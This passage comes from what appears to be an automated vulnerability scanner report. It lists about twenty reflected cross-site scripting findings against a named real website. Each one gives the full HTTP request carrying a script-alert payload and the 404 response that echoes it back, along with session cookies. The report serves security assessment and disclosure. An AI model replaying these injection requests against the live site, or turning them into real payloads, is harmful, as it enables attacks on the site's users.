<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/subscribe.php?e5baa\"><a>abfadc9a4cc=1" />
...[SNIP]...

2.814. http://www.resellerbase.com/detail.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 938f2<script>alert(1)</script>48553e45a4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail.php938f2<script>alert(1)</script>48553e45a4a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail.php938f2<script>alert(1)</script>48553e45a4a was not found on this server.</p>
...[SNIP]...

2.815. http://www.resellerbase.com/detail.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload af386<a>850d0235cee was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail.php?id=555-555-0199@example.comaf386<a>850d0235cee HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail.php?id=555-555-0199@example.comaf386<a>850d0235cee was not found on this server.</p>
...[SNIP]...

2.816. http://www.resellerbase.com/detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dea3a<a>04e445facb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail.php?id=555-555-0199@example/dea3a<a>04e445facb4.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail.php?id=555-555-0199@example/dea3a<a>04e445facb4.com was not found on this server.</p>
...[SNIP]...

2.817. http://www.resellerbase.com/detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a2104<script>alert(1)</script>d49743fbc8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail.php?a2104<script>alert(1)</script>d49743fbc8a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail.php?a2104<script>alert(1)</script>d49743fbc8a=1 was not found on this server.</p>
...[SNIP]...

2.818. http://www.resellerbase.com/detail/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c7ac<script>alert(1)</script>fbb3a482dea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2c7ac<script>alert(1)</script>fbb3a482dea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2c7ac<script>alert(1)</script>fbb3a482dea/ was not found on this server.</p>
...[SNIP]...

2.819. http://www.resellerbase.com/detail/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa6b6<script>alert(1)</script>ec1a3162bf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/?aa6b6<script>alert(1)</script>ec1a3162bf8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/?aa6b6<script>alert(1)</script>ec1a3162bf8=1 was not found on this server.</p>
...[SNIP]...

2.820. http://www.resellerbase.com/detail/10/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b338<script>alert(1)</script>ccdb94c784d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3b338<script>alert(1)</script>ccdb94c784d/10/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3b338<script>alert(1)</script>ccdb94c784d/10/ was not found on this server.</p>
...[SNIP]...

2.821. http://www.resellerbase.com/detail/10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce687<script>alert(1)</script>365eaa5ebcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10ce687<script>alert(1)</script>365eaa5ebcc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10ce687<script>alert(1)</script>365eaa5ebcc/ was not found on this server.</p>
...[SNIP]...

2.822. http://www.resellerbase.com/detail/10/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 94020<script>alert(1)</script>01712bfc583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/?94020<script>alert(1)</script>01712bfc583=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/?94020<script>alert(1)</script>01712bfc583=1 was not found on this server.</p>
...[SNIP]...

2.823. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f84b0<script>alert(1)</script>1d536714c00e7995d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailf84b0<script>alert(1)</script>1d536714c00e7995d/10/rating.php?id=10&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf84b0<script>alert(1)</script>1d536714c00e7995d/10/rating.php?id=10&rating=5 was not found on this server.</p>
...[SNIP]...

2.824. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2811f<script>alert(1)</script>5adfcbff9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2811f<script>alert(1)</script>5adfcbff9e0/10/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2811f<script>alert(1)</script>5adfcbff9e0/10/rating.php was not found on this server.</p>
...[SNIP]...

2.825. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a17f8<script>alert(1)</script>4bee95bd065fe8d2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/10a17f8<script>alert(1)</script>4bee95bd065fe8d2c/rating.php?id=10&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10a17f8<script>alert(1)</script>4bee95bd065fe8d2c/rating.php?id=10&rating=5 was not found on this server.</p>
...[SNIP]...

2.826. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5310<script>alert(1)</script>2a257653b76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10c5310<script>alert(1)</script>2a257653b76/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10c5310<script>alert(1)</script>2a257653b76/rating.php was not found on this server.</p>
...[SNIP]...

2.827. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81ff5<script>alert(1)</script>2ba002b959df8c86d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/10/rating.php81ff5<script>alert(1)</script>2ba002b959df8c86d?id=10&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/rating.php81ff5<script>alert(1)</script>2ba002b959df8c86d?id=10&rating=5 was not found on this server.</p>
...[SNIP]...

2.828. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7da50<script>alert(1)</script>154fc29aed0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/rating.php7da50<script>alert(1)</script>154fc29aed0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/rating.php7da50<script>alert(1)</script>154fc29aed0 was not found on this server.</p>
...[SNIP]...

2.829. http://www.resellerbase.com/detail/10/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9ccb8<script>alert(1)</script>31b9d9a7f1398a48b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/10/rating.php/9ccb8<script>alert(1)</script>31b9d9a7f1398a48b?id=10&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/rating.php/9ccb8<script>alert(1)</script>31b9d9a7f1398a48b?id=10&rating=5 was not found on this server.</p>
...[SNIP]...

2.830. http://www.resellerbase.com/detail/10/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload acdf2<script>alert(1)</script>9bca1a4857e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/rating.php?acdf2<script>alert(1)</script>9bca1a4857e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/rating.php?acdf2<script>alert(1)</script>9bca1a4857e=1 was not found on this server.</p>
...[SNIP]...

2.831. http://www.resellerbase.com/detail/10/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d53e1<script>alert(1)</script>853346db445 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild53e1<script>alert(1)</script>853346db445/10/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild53e1<script>alert(1)</script>853346db445/10/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.832. http://www.resellerbase.com/detail/10/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e859<script>alert(1)</script>336be86808e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/104e859<script>alert(1)</script>336be86808e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/104e859<script>alert(1)</script>336be86808e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.833. http://www.resellerbase.com/detail/10/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8e899<script>alert(1)</script>efa70996aa5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/search.php8e899<script>alert(1)</script>efa70996aa5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

